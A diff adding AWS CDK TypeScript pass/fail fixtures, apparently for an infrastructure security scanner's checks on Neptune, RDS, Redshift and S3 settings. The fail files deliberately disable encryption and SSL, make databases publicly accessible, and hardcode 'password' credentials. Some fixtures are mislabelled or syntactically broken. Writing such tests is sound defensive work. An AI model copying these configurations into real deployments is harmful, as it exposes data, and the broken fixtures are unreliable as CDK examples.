+        virtualName: 'virtualName',
+    }],
+});
+
+const cfnSecurityConfiguration3 = new autoscaling.CfnLaunchConfiguration(this, 'MyCfnSecurityConfiguration', {
+    imageId: 'imageId',
+    instanceType: 'instanceType',
+    blockDeviceMappings: [{
+        deviceName: 'deviceName',
+        noDevice: false,
+        virtualName: 'virtualName',
+    }],
+});
+
+const cfnSecurityConfigurationProps1: autoscaling.CfnLaunchConfigurationProps = {
+    imageId: 'imageId',
+    instanceType: 'instanceType',
+
+    // the properties below are optional
+    associatePublicIpAddress: false,
+    blockDeviceMappings: [{
+        deviceName: 'deviceName',
+
+        // the properties below are optional
+        ebs: {
+            deleteOnTermination: false,
+            encrypted: true,
+            iops: 123,
+            snapshotId: 'snapshotId',
+            throughput: 123,
+            volumeSize: 123,
+            volumeType: 'volumeType',
+        },
+        noDevice: false,
+        virtualName: 'virtualName',
+    }],
+    classicLinkVpcId: 'classicLinkVpcId',
+    classicLinkVpcSecurityGroups: ['classicLinkVpcSecurityGroups'],
+    ebsOptimized: false,
+    iamInstanceProfile: 'iamInstanceProfile',
+    instanceId: 'instanceId',
+    instanceMonitoring: false,
+    kernelId: 'kernelId',
+    keyName: 'keyName',
+    launchConfigurationName: 'launchConfigurationName',
+    metadataOptions: {
+        httpEndpoint: 'httpEndpoint',
+        httpPutResponseHopLimit: 123,
+        httpTokens: 'httpTokens',
+    },
+    placementTenancy: 'placementTenancy',
+    ramDiskId: 'ramDiskId',
+    securityGroups: ['securityGroups'],
+    spotPrice: 'spotPrice',
+    userData: 'userData',
+};
+
+const cfnSecurityConfigurationProps2: autoscaling.CfnLaunchConfigurationProps = {
+    imageId: 'imageId',
+    instanceType: 'instanceType',
+
+    // the properties below are optional
+    associatePublicIpAddress: false,
+    blockDeviceMappings: [{
+        deviceName: 'deviceName',
+        noDevice: false,
+        virtualName: 'virtualName',
+    }],
+    classicLinkVpcId: 'classicLinkVpcId',
+    classicLinkVpcSecurityGroups: ['classicLinkVpcSecurityGroups'],
+    ebsOptimized: false,
+    iamInstanceProfile: 'iamInstanceProfile',
+    instanceId: 'instanceId',
+    instanceMonitoring: false,
+    kernelId: 'kernelId',
+    keyName: 'keyName',
+    launchConfigurationName: 'launchConfigurationName',
+    metadataOptions: {
+        httpEndpoint: 'httpEndpoint',
+        httpPutResponseHopLimit: 123,
+        httpTokens: 'httpTokens',
+    },
+    placementTenancy: 'placementTenancy',
+    ramDiskId: 'ramDiskId',
+    securityGroups: ['securityGroups'],
+    spotPrice: 'spotPrice',
+    userData: 'userData',
+};
+
+const cfnSecurityConfigurationProps3: autoscaling.CfnLaunchConfigurationProps = {
+    imageId: 'imageId',
+    instanceType: 'instanceType',
+
+    // the properties below are optional
+    associatePublicIpAddress: false,
+    classicLinkVpcId: 'classicLinkVpcId',
+    classicLinkVpcSecurityGroups: ['classicLinkVpcSecurityGroups'],
+    ebsOptimized: false,
+    iamInstanceProfile: 'iamInstanceProfile',
+    instanceId: 'instanceId',
+    instanceMonitoring: false,
+    kernelId: 'kernelId',
+    keyName: 'keyName',
+    launchConfigurationName: 'launchConfigurationName',
+    metadataOptions: {
+        httpEndpoint: 'httpEndpoint',
+        httpPutResponseHopLimit: 123,
+        httpTokens: 'httpTokens',
+    },
+    placementTenancy: 'placementTenancy',
+    ramDiskId: 'ramDiskId',
+    securityGroups: ['securityGroups'],
+    spotPrice: 'spotPrice',
+    userData: 'userData',
+};
+
diff --git a/cdk_integration_tests/src/typescript/NeptuneClusterStorageEncrypted/fail.ts b/cdk_integration_tests/src/typescript/NeptuneClusterStorageEncrypted/fail.ts
new file mode 100644
index 00000000000..b84b3a028dd
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/NeptuneClusterStorageEncrypted/fail.ts
@@ -0,0 +1,44 @@
+import { aws_neptune as neptune } from 'aws-cdk-lib';
+
+const cfnDBCluster1: neptune.CfnDBClusterProps = {
+  associatedRoles: [{
+    roleArn: 'roleArn',
+
+    // the properties below are optional
+    featureName: 'featureName',
+  }],
+  availabilityZones: ['availabilityZones'],
+  backupRetentionPeriod: 123,
+  copyTagsToSnapshot: false,
+  dbClusterIdentifier: 'dbClusterIdentifier',
+  dbClusterParameterGroupName: 'dbClusterParameterGroupName',
+  dbInstanceParameterGroupName: 'dbInstanceParameterGroupName',
+  dbPort: 123,
+  dbSubnetGroupName: 'dbSubnetGroupName',
+  deletionProtection: false,
+  enableCloudwatchLogsExports: ['enableCloudwatchLogsExports'],
+  engineVersion: 'engineVersion',
+  iamAuthEnabled: false,
+  kmsKeyId: 'kmsKeyId',
+  preferredBackupWindow: 'preferredBackupWindow',
+  preferredMaintenanceWindow: 'preferredMaintenanceWindow',
+  restoreToTime: 'restoreToTime',
+  restoreType: 'restoreType',
+  serverlessScalingConfiguration: {
+    maxCapacity: 123,
+    minCapacity: 123,
+  },
+  snapshotIdentifier: 'snapshotIdentifier',
+  sourceDbClusterIdentifier: 'sourceDbClusterIdentifier',
+  storageEncrypted: false,
+  tags: [{
+    key: 'key',
+    value: 'value',
+  }],
+  useLatestRestorableTime: false,
+  vpcSecurityGroupIds: ['vpcSecurityGroupIds'],
+});
+
+const cfnDBCluster2: neptune.CfnDBClusterProps =  {
+  storageEncrypted: false,
+};
diff --git a/cdk_integration_tests/src/typescript/NeptuneClusterStorageEncrypted/fail2.ts b/cdk_integration_tests/src/typescript/NeptuneClusterStorageEncrypted/fail2.ts
new file mode 100644
index 00000000000..861932fa4bc
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/NeptuneClusterStorageEncrypted/fail2.ts
@@ -0,0 +1,44 @@
+import { aws_neptune as neptune } from 'aws-cdk-lib';
+
+const cfnDBCluster1 = new neptune.CfnDBCluster(this, 'MyCfnDBCluster', /* all optional props */ {
+  associatedRoles: [{
+    roleArn: 'roleArn',
+
+    // the properties below are optional
+    featureName: 'featureName',
+  }],
+  availabilityZones: ['availabilityZones'],
+  backupRetentionPeriod: 123,
+  copyTagsToSnapshot: false,
+  dbClusterIdentifier: 'dbClusterIdentifier',
+  dbClusterParameterGroupName: 'dbClusterParameterGroupName',
+  dbInstanceParameterGroupName: 'dbInstanceParameterGroupName',
+  dbPort: 123,
+  dbSubnetGroupName: 'dbSubnetGroupName',
+  deletionProtection: false,
+  enableCloudwatchLogsExports: ['enableCloudwatchLogsExports'],
+  engineVersion: 'engineVersion',
+  iamAuthEnabled: false,
+  kmsKeyId: 'kmsKeyId',
+  preferredBackupWindow: 'preferredBackupWindow',
+  preferredMaintenanceWindow: 'preferredMaintenanceWindow',
+  restoreToTime: 'restoreToTime',
+  restoreType: 'restoreType',
+  serverlessScalingConfiguration: {
+    maxCapacity: 123,
+    minCapacity: 123,
+  },
+  snapshotIdentifier: 'snapshotIdentifier',
+  sourceDbClusterIdentifier: 'sourceDbClusterIdentifier',
+  storageEncrypted: false,
+  tags: [{
+    key: 'key',
+    value: 'value',
+  }],
+  useLatestRestorableTime: false,
+  vpcSecurityGroupIds: ['vpcSecurityGroupIds'],
+});
+
+const cfnDBCluster2 = new neptune.CfnDBCluster(this, 'MyCfnDBCluster', /* all optional props */ {
+  storageEncrypted: false,
+});
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/NeptuneClusterStorageEncrypted/pass.ts b/cdk_integration_tests/src/typescript/NeptuneClusterStorageEncrypted/pass.ts
new file mode 100644
index 00000000000..c7bfa3cac36
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/NeptuneClusterStorageEncrypted/pass.ts
@@ -0,0 +1,87 @@
+import {aws_neptune as neptune} from 'aws-cdk-lib';
+
+const cfnDBCluster1 = new neptune.CfnDBCluster(this, 'MyCfnDBCluster', /* all optional props */ {
+    associatedRoles: [{
+        roleArn: 'roleArn',
+
+        // the properties below are optional
+        featureName: 'featureName',
+    }],
+    availabilityZones: ['availabilityZones'],
+    backupRetentionPeriod: 123,
+    copyTagsToSnapshot: false,
+    dbClusterIdentifier: 'dbClusterIdentifier',
+    dbClusterParameterGroupName: 'dbClusterParameterGroupName',
+    dbInstanceParameterGroupName: 'dbInstanceParameterGroupName',
+    dbPort: 123,
+    dbSubnetGroupName: 'dbSubnetGroupName',
+    deletionProtection: false,
+    enableCloudwatchLogsExports: ['enableCloudwatchLogsExports'],
+    engineVersion: 'engineVersion',
+    iamAuthEnabled: false,
+    kmsKeyId: 'kmsKeyId',
+    preferredBackupWindow: 'preferredBackupWindow',
+    preferredMaintenanceWindow: 'preferredMaintenanceWindow',
+    restoreToTime: 'restoreToTime',
+    restoreType: 'restoreType',
+    serverlessScalingConfiguration: {
+        maxCapacity: 123,
+        minCapacity: 123,
+    },
+    snapshotIdentifier: 'snapshotIdentifier',
+    sourceDbClusterIdentifier: 'sourceDbClusterIdentifier',
+    storageEncrypted: true,
+    tags: [{
+        key: 'key',
+        value: 'value',
+    }],
+    useLatestRestorableTime: false,
+    vpcSecurityGroupIds: ['vpcSecurityGroupIds'],
+});
+
+const cfnDBCluster2 = new neptune.CfnDBCluster(this, 'MyCfnDBCluster', /* all optional props */ {
+    storageEncrypted: true,
+});
+
+const cfnDBCluster4: neptune.CfnDBClusterProps = {
+  associatedRoles: [{
+    roleArn: 'roleArn',
+
+    // the properties below are optional
+    featureName: 'featureName',
+  }],
+  availabilityZones: ['availabilityZones'],
+  backupRetentionPeriod: 123,
+  copyTagsToSnapshot: false,
+  dbClusterIdentifier: 'dbClusterIdentifier',
+  dbClusterParameterGroupName: 'dbClusterParameterGroupName',
+  dbInstanceParameterGroupName: 'dbInstanceParameterGroupName',
+  dbPort: 123,
+  dbSubnetGroupName: 'dbSubnetGroupName',
+  deletionProtection: false,
+  enableCloudwatchLogsExports: ['enableCloudwatchLogsExports'],
+  engineVersion: 'engineVersion',
+  iamAuthEnabled: false,
+  kmsKeyId: 'kmsKeyId',
+  preferredBackupWindow: 'preferredBackupWindow',
+  preferredMaintenanceWindow: 'preferredMaintenanceWindow',
+  restoreToTime: 'restoreToTime',
+  restoreType: 'restoreType',
+  serverlessScalingConfiguration: {
+    maxCapacity: 123,
+    minCapacity: 123,
+  },
+  snapshotIdentifier: 'snapshotIdentifier',
+  sourceDbClusterIdentifier: 'sourceDbClusterIdentifier',
+  storageEncrypted: true,
+  tags: [{
+    key: 'key',
+    value: 'value',
+  }],
+  useLatestRestorableTime: false,
+  vpcSecurityGroupIds: ['vpcSecurityGroupIds'],
+});
+
+const cfnDBCluster5: neptune.CfnDBClusterProps =  {
+  storageEncrypted: true,
+};
diff --git a/cdk_integration_tests/src/typescript/RDSEnhancedMonitorEnabled/fail2.ts b/cdk_integration_tests/src/typescript/RDSEnhancedMonitorEnabled/fail2.ts
new file mode 100644
index 00000000000..ea8cb01972b
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RDSEnhancedMonitorEnabled/fail2.ts
@@ -0,0 +1,27 @@
+import {aws_rds as rds} from 'aws-cdk-lib';
+
+const instance2 = new rds.DatabaseInstance(this, "PostgresInstance2", {
+    engine: rds.DatabaseInstanceEngine.POSTGRES,
+    credentials: {
+        username: 'username',
+        password: 'password'
+    },
+    monitoringInterval: 0,
+});
+
+const instance1 = new rds.DatabaseInstance(this, "PostgresInstance2", {
+    engine: rds.DatabaseInstanceEngine.POSTGRES,
+    credentials: {
+        username: 'username',
+        password: 'password'
+    },
+    monitoringInterval: -1,
+});
+
+const instance3 = new rds.DatabaseInstance(this, "PostgresInstance2", {
+    engine: rds.DatabaseInstanceEngine.POSTGRES,
+    credentials: {
+        username: 'username',
+        password: 'password'
+    },
+});
diff --git a/cdk_integration_tests/src/typescript/RDSEnhancedMonitorEnabled/pass.ts b/cdk_integration_tests/src/typescript/RDSEnhancedMonitorEnabled/pass.ts
new file mode 100644
index 00000000000..5a5e8c0f1e5
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RDSEnhancedMonitorEnabled/pass.ts
@@ -0,0 +1,20 @@
+import {aws_rds as rds} from 'aws-cdk-lib';
+
+const instance2 = new rds.DatabaseInstance(this, "PostgresInstance2", {
+    engine: rds.DatabaseInstanceEngine.POSTGRES,
+    credentials: {
+        username: 'username',
+        password: 'password'
+    },
+    monitoringInterval: 1,
+});
+
+const instance1 = new rds.DatabaseInstance(this, "PostgresInstance2", {
+    engine: rds.DatabaseInstanceEngine.POSTGRES,
+    credentials: {
+        username: 'username',
+        password: 'password'
+    },
+    monitoringInterval: 322424,
+});
+
diff --git a/cdk_integration_tests/src/typescript/RDSMultiAZEnabled/fail.ts b/cdk_integration_tests/src/typescript/RDSMultiAZEnabled/fail.ts
new file mode 100644
index 00000000000..0a4c784e132
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RDSMultiAZEnabled/fail.ts
@@ -0,0 +1,10 @@
+// SOURCE
+import { DatabaseInstance } from '@aws-cdk/aws-rds';
+
+// SINK
+// SINK: Vulnerability found due to missing Multi-AZ setting
+new DatabaseInstance(stack, 'MyDatabaseInstance', {
+    instanceType: ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.MICRO),
+    vpc
+    // missing Multi-AZ setting
+});
diff --git a/cdk_integration_tests/src/typescript/RDSMultiAZEnabled/pass.ts b/cdk_integration_tests/src/typescript/RDSMultiAZEnabled/pass.ts
new file mode 100644
index 00000000000..77af0d727c9
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RDSMultiAZEnabled/pass.ts
@@ -0,0 +1,10 @@
+// SOURCE
+import { DatabaseInstance } from '@aws-cdk/aws-rds';
+
+// SINK
+// SINK: Vulnerability found due to missing Multi-AZ setting
+new DatabaseInstance(stack, 'MyDatabaseInstance', {
+    instanceType: ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.MICRO),
+    vpc,
+    multiAZ: true
+});
diff --git a/cdk_integration_tests/src/typescript/RDSPubliclyAccessible/fail.ts b/cdk_integration_tests/src/typescript/RDSPubliclyAccessible/fail.ts
new file mode 100644
index 00000000000..d125920e0f8
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RDSPubliclyAccessible/fail.ts
@@ -0,0 +1,10 @@
+// SOURCE
+import { DatabaseInstance } from '@aws-cdk/aws-rds';
+
+// SINK
+// SINK: Vulnerability found due to publicly accessible setting
+new DatabaseInstance(stack, 'MyDatabaseInstance', {
+    instanceType: ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.MICRO),
+    vpc
+    // publicly accessible setting missing
+});
diff --git a/cdk_integration_tests/src/typescript/RDSPubliclyAccessible/pass.ts b/cdk_integration_tests/src/typescript/RDSPubliclyAccessible/pass.ts
new file mode 100644
index 00000000000..07d46be962d
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RDSPubliclyAccessible/pass.ts
@@ -0,0 +1,8 @@
+// SOURCE
+import { DatabaseInstance } from '@aws-cdk/aws-rds';
+
+// SINK
+new DatabaseInstance(stack, 'MyDatabaseInstance', {
+    instanceType: ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.MICRO),
+    vpc, publicly_accessible: true
+});
diff --git a/cdk_integration_tests/src/typescript/RedShiftSSL/fail__2__.ts b/cdk_integration_tests/src/typescript/RedShiftSSL/fail__2__.ts
new file mode 100644
index 00000000000..3fc0ab5c33c
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedShiftSSL/fail__2__.ts
@@ -0,0 +1,40 @@
+import * as cdk from 'aws-cdk-lib';
+import * as redshift from 'aws-cdk-lib/aws-redshift';
+
+class MyRedshiftClusterParameterGroupStack extends cdk.Stack {
+    constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+
+        // Define Redshift Cluster Parameter Group with require_ssl parameter
+        new redshift.CfnClusterParameterGroup(this, 'MyRedshiftClusterParameterGroup', {
+            description: 'My Redshift Parameter Group',
+            parameterGroupFamily: 'redshift-1.0',
+            parameters: [
+                {
+                    parameterName: 'require_ssl',
+                    parameterValue: 'false',
+                },
+                // Add other parameters if needed
+            ],
+        });
+    }
+}
+
+const app = new cdk.App();
+new MyRedshiftClusterParameterGroupStack(app, 'MyRedshiftClusterParameterGroupStack');
+app.synth();
+
+class MyRedshiftClusterParameterGroupStack2 extends cdk.Stack {
+    constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+
+        // Define Redshift Cluster Parameter Group with abc parameter
+        new redshift.CfnClusterParameterGroup(this, 'MyRedshiftClusterParameterGroup2', {
+            description: 'My Redshift Parameter Group 2',
+            parameterGroupFamily: 'redshift-1.0',
+        });
+    }
+}
+
+new MyRedshiftClusterParameterGroupStack2(app, 'MyRedshiftClusterParameterGroupStack2');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/RedShiftSSL/pass.ts b/cdk_integration_tests/src/typescript/RedShiftSSL/pass.ts
new file mode 100644
index 00000000000..58bf4c323f2
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedShiftSSL/pass.ts
@@ -0,0 +1,25 @@
+import * as cdk from 'aws-cdk-lib';
+import * as redshift from 'aws-cdk-lib/aws-redshift';
+
+class MyRedshiftClusterParameterGroupStack extends cdk.Stack {
+    constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+
+        // Define Redshift Cluster Parameter Group with require_ssl parameter
+        new redshift.CfnClusterParameterGroup(this, 'MyRedshiftClusterParameterGroup', {
+            description: 'My Redshift Parameter Group',
+            parameterGroupFamily: 'redshift-1.0',
+            parameters: [
+                {
+                    parameterName: 'require_ssl',
+                    parameterValue: 'true',
+                },
+                // Add other parameters if needed
+            ],
+        });
+    }
+}
+
+const app = new cdk.App();
+new MyRedshiftClusterParameterGroupStack(app, 'MyRedshiftClusterParameterGroupStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/RedshiftClusterEncryption/fail__2__.ts b/cdk_integration_tests/src/typescript/RedshiftClusterEncryption/fail__2__.ts
new file mode 100644
index 00000000000..5707c4e37e6
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedshiftClusterEncryption/fail__2__.ts
@@ -0,0 +1,51 @@
+import * as redshift from '@aws-cdk/aws-redshift-alpha';
+import * as kms from 'aws-cdk-lib/aws-kms';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import { Stack, App } from 'aws-cdk-lib';
+
+const app = new App();
+const stack = new Stack(app, 'RedshiftStack');
+
+// Create a VPC
+const vpc = new ec2.Vpc(stack, 'Vpc', {
+    maxAzs: 2
+});
+
+// Create a KMS key for encryption
+const kmsKey = new kms.Key(stack, 'KmsKey');
+
+const cluster = new redshift.Cluster(stack, 'MyCluster', {
+    masterUser: {
+        masterUsername: 'admin',
+    },
+    vpc,
+});
+
+import * as redshift from 'aws-cdk-lib/aws_redshift';
+import * as kms from 'aws-cdk-lib/aws-kms';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import { Stack, App } from 'aws-cdk-lib';
+
+const app = new App();
+const stack = new Stack(app, 'RedshiftStack');
+
+// Create a VPC
+const vpc = new ec2.Vpc(stack, 'Vpc', {
+    maxAzs: 2
+});
+
+// Create a KMS key for encryption
+const kmsKey = new kms.Key(stack, 'KmsKey');
+
+const cfnCluster = new redshift.CfnCluster(stack, 'MyCfnCluster', {
+    clusterType: 'multi-node',
+    dbName: 'mydatabase',
+    masterUsername: 'admin',
+    masterUserPassword: 'password',
+    nodeType: 'ds2.xlarge',
+    numberOfNodes: 3,
+    kmsKeyId: kmsKey.keyArn, // Use the specific KMS key
+    vpcSecurityGroupIds: [ /* security group IDs */ ],
+    clusterSubnetGroupName: vpc.selectSubnets({ subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS }).subnetIds[0],
+});
+
diff --git a/cdk_integration_tests/src/typescript/RedshiftClusterEncryption/pass.ts b/cdk_integration_tests/src/typescript/RedshiftClusterEncryption/pass.ts
new file mode 100644
index 00000000000..89f606eaa08
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedshiftClusterEncryption/pass.ts
@@ -0,0 +1,53 @@
+import * as redshift from '@aws-cdk/aws-redshift-alpha';
+import * as kms from 'aws-cdk-lib/aws-kms';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import { Stack, App } from 'aws-cdk-lib';
+
+const app = new App();
+const stack = new Stack(app, 'RedshiftStack');
+
+// Create a VPC
+const vpc = new ec2.Vpc(stack, 'Vpc', {
+    maxAzs: 2
+});
+
+// Create a KMS key for encryption
+const kmsKey = new kms.Key(stack, 'KmsKey');
+
+const cluster = new redshift.Cluster(stack, 'MyCluster', {
+    masterUser: {
+        masterUsername: 'admin',
+    },
+    vpc,
+    encryption: true,
+});
+
+import * as redshift from 'aws-cdk-lib/aws_redshift';
+import * as kms from 'aws-cdk-lib/aws-kms';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import { Stack, App } from 'aws-cdk-lib';
+
+const app = new App();
+const stack = new Stack(app, 'RedshiftStack');
+
+// Create a VPC
+const vpc = new ec2.Vpc(stack, 'Vpc', {
+    maxAzs: 2
+});
+
+// Create a KMS key for encryption
+const kmsKey = new kms.Key(stack, 'KmsKey');
+
+const cfnCluster = new redshift.CfnCluster(stack, 'MyCfnCluster', {
+    clusterType: 'multi-node',
+    dbName: 'mydatabase',
+    masterUsername: 'admin',
+    masterUserPassword: 'password',
+    nodeType: 'ds2.xlarge',
+    numberOfNodes: 3,
+    encryption: true,
+    kmsKeyId: kmsKey.keyArn, // Use the specific KMS key
+    vpcSecurityGroupIds: [ /* security group IDs */ ],
+    clusterSubnetGroupName: vpc.selectSubnets({ subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS }).subnetIds[0],
+});
+
diff --git a/cdk_integration_tests/src/typescript/RedshiftClusterLogging/fail.ts b/cdk_integration_tests/src/typescript/RedshiftClusterLogging/fail.ts
new file mode 100644
index 00000000000..2ba5ef3a2be
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedshiftClusterLogging/fail.ts
@@ -0,0 +1,13 @@
+// SOURCE
+import { Cluster } from '@aws-cdk/aws-redshift';
+
+// SINK
+// SINK: Vulnerability found due to missing logging enabled
+new Cluster(stack, 'MyRedshiftCluster', {
+    masterUser: {
+        masterUsername: 'admin',
+        masterPassword: 'password',
+    },
+    vpc
+    // logging enabled missing
+});
diff --git a/cdk_integration_tests/src/typescript/RedshiftClusterLogging/pass.ts b/cdk_integration_tests/src/typescript/RedshiftClusterLogging/pass.ts
new file mode 100644
index 00000000000..b3dc48a7820
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedshiftClusterLogging/pass.ts
@@ -0,0 +1,15 @@
+// SOURCE
+import { Cluster } from '@aws-cdk/aws-redshift';
+
+// SINK
+// SINK: Vulnerability found due to missing logging enabled
+let bucketName;
+let stack;
+new Cluster(stack, 'MyRedshiftCluster', {
+    masterUser: {
+        masterUsername: 'admin',
+        masterPassword: 'password',
+    },
+    logging_properties: Cluster.LoggingPropertiesProperty = {bucketName: 'name'}
+    // logging enabled missing
+});
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/RedshiftClusterPubliclyAccessible/fail.ts b/cdk_integration_tests/src/typescript/RedshiftClusterPubliclyAccessible/fail.ts
new file mode 100644
index 00000000000..2f3cd26fb8c
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedshiftClusterPubliclyAccessible/fail.ts
@@ -0,0 +1,13 @@
+// SOURCE
+import { Cluster } from '@aws-cdk/aws-redshift';
+
+// SINK
+// SINK: Vulnerability found due to publicly accessible cluster
+new Cluster(stack, 'MyRedshiftCluster', {
+    masterUser: {
+        masterUsername: 'admin',
+        masterPassword: 'password',
+    },
+    vpc,
+    publiclyAccessible: true, // publicly accessible cluster
+});
diff --git a/cdk_integration_tests/src/typescript/RedshiftClusterPubliclyAccessible/pass.ts b/cdk_integration_tests/src/typescript/RedshiftClusterPubliclyAccessible/pass.ts
new file mode 100644
index 00000000000..26fb3b30ba5
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedshiftClusterPubliclyAccessible/pass.ts
@@ -0,0 +1,20 @@
+// SOURCE
+import { Cluster } from '@aws-cdk/aws-redshift';
+
+// SINK
+// SINK: Vulnerability found due to publicly accessible cluster
+new Cluster(stack, 'MyRedshiftCluster', {
+    masterUser: {
+        masterUsername: 'admin',
+        masterPassword: 'password',
+    },
+    vpc,
+    publiclyAccessible: false,
+});
+new Cluster(stack, 'MyRedshiftCluster', {
+    masterUser: {
+        masterUsername: 'admin',
+        masterPassword: 'password',
+    },
+    vpc
+});
diff --git a/cdk_integration_tests/src/typescript/RedshiftInEc2ClassicMode/fail.ts b/cdk_integration_tests/src/typescript/RedshiftInEc2ClassicMode/fail.ts
new file mode 100644
index 00000000000..b0c7319bae7
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedshiftInEc2ClassicMode/fail.ts
@@ -0,0 +1,12 @@
+// SOURCE
+import { Cluster } from '@aws-cdk/aws-redshift';
+
+// SINK
+// SINK: Vulnerability found due to Redshift cluster deployed outside of a VPC
+new Cluster(stack, 'MyRedshiftCluster', {
+    masterUser: {
+        masterUsername: 'admin',
+        masterPassword: 'password',
+    },
+    vpc: vpc
+});
diff --git a/cdk_integration_tests/src/typescript/RedshiftInEc2ClassicMode/pass.ts b/cdk_integration_tests/src/typescript/RedshiftInEc2ClassicMode/pass.ts
new file mode 100644
index 00000000000..7aefe9c0d19
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedshiftInEc2ClassicMode/pass.ts
@@ -0,0 +1,12 @@
+// SOURCE
+import { Cluster } from '@aws-cdk/aws-redshift';
+
+// SINK
+new Cluster(stack, 'MyRedshiftCluster', {
+    masterUser: {
+        masterUsername: 'admin',
+        masterPassword: 'password',
+    },
+    vpc: vpc,
+    clusterSubnetGroupName: 'name'
+});
diff --git a/cdk_integration_tests/src/typescript/S3BlockPublicACLs/fail.ts b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/fail.ts
new file mode 100644
index 00000000000..c6089d96d1f
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/fail.ts
@@ -0,0 +1,16 @@
+import * as cdk from 'aws-cdk-lib';
+import { Stack, App } from 'aws-cdk-lib';
+import * as s3 from 'aws-cdk-lib/aws-s3';
+
+const app = new App();
+const stack = new Stack(app, 'S3BucketStack');
+
+// Create an S3 bucket with blockPublicAcls enabled
+const bucket = new s3.Bucket(stack, 'MyBucket', {
+    blockPublicAccess: s3.BlockPublicAccess.IGNORE_ACLS,
+    versioned: true,
+    removalPolicy: cdk.RemovalPolicy.DESTROY,
+    autoDeleteObjects: true,
+});
+
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/S3BlockPublicACLs/fail__3__.ts b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/fail__3__.ts
new file mode 100644
index 00000000000..7461ac32d85
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/fail__3__.ts
@@ -0,0 +1,46 @@
+import * as cdk from 'aws-cdk-lib';
+import { Stack, App } from 'aws-cdk-lib';
+import { Bucket, BlockPublicAccess } from 'aws-cdk-lib/aws-s3';
+
+const app = new App();
+const stack = new Stack(app, 'S3BucketStack');
+
+// Create an S3 bucket with blockPublicAcls enabled
+const bucket = new Bucket(stack, 'MyBucket', {
+    blockPublicAccess: BlockPublicAccess.IGNORE_ACLS,
+    versioned: true,
+    removalPolicy: cdk.RemovalPolicy.DESTROY,
+    autoDeleteObjects: true,
+});
+
+const bucket2 = new Bucket(stack, 'MyBucket', {
+    versioned: true,
+    removalPolicy: cdk.RemovalPolicy.DESTROY,
+    autoDeleteObjects: true,
+});
+
+app.synth();
+
+import * as cdk from 'aws-cdk-lib';
+import { Stack, App } from 'aws-cdk-lib';
+import * as s3 from 'aws-cdk-lib/aws-s3';
+
+const app = new App();
+const stack = new Stack(app, 'S3BucketStack');
+
+// Create an S3 bucket with blockPublicAcls enabled
+const bucket = new s3.CfnBucket(stack, 'MyBucket', {
+    bucketName: 'my-bucket-name', // Optional: Specify a bucket name
+    versioningConfiguration: {
+        status: 'Enabled',
+    },
+    publicAccessBlockConfiguration: {
+        blockPublicAcls: false, // Only block public ACLs
+        ignorePublicAcls: true,
+    },
+});
+
+bucket.applyRemovalPolicy(cdk.RemovalPolicy.DESTROY);
+
+app.synth();
+
diff --git a/cdk_integration_tests/src/typescript/S3BlockPublicACLs/pass.ts b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/pass.ts
new file mode 100644
index 00000000000..5d369128d40
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/pass.ts
@@ -0,0 +1,23 @@
+import * as cdk from 'aws-cdk-lib';
+import { Stack, App } from 'aws-cdk-lib';
+import * as s3 from 'aws-cdk-lib/aws-s3';
+
+const app = new App();
+const stack = new Stack(app, 'S3BucketStack');
+
+// Create an S3 bucket with blockPublicAcls enabled
+const bucket = new s3.Bucket(stack, 'MyBucket', {
+  blockPublicAccess: s3.BlockPublicAccess.BLOCK_ACLS, // Only block public ACLs
+  versioned: true,
+  removalPolicy: cdk.RemovalPolicy.DESTROY, // NOT recommended for production code
+  autoDeleteObjects: true, // NOT recommended for production code
+});
+
+const bucket2 = new s3.Bucket(stack, 'MyBucket', {
+  blockPublicAccess: s3.BlockPublicAccess.BLOCK_ALL, // Only block public ACLs
+  versioned: true,
+  removalPolicy: cdk.RemovalPolicy.DESTROY, // NOT recommended for production code
+  autoDeleteObjects: true, // NOT recommended for production code
+});
+
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/S3BlockPublicACLs/pass2.ts b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/pass2.ts
new file mode 100644
index 00000000000..dc4dc803e8f
--- /dev/null
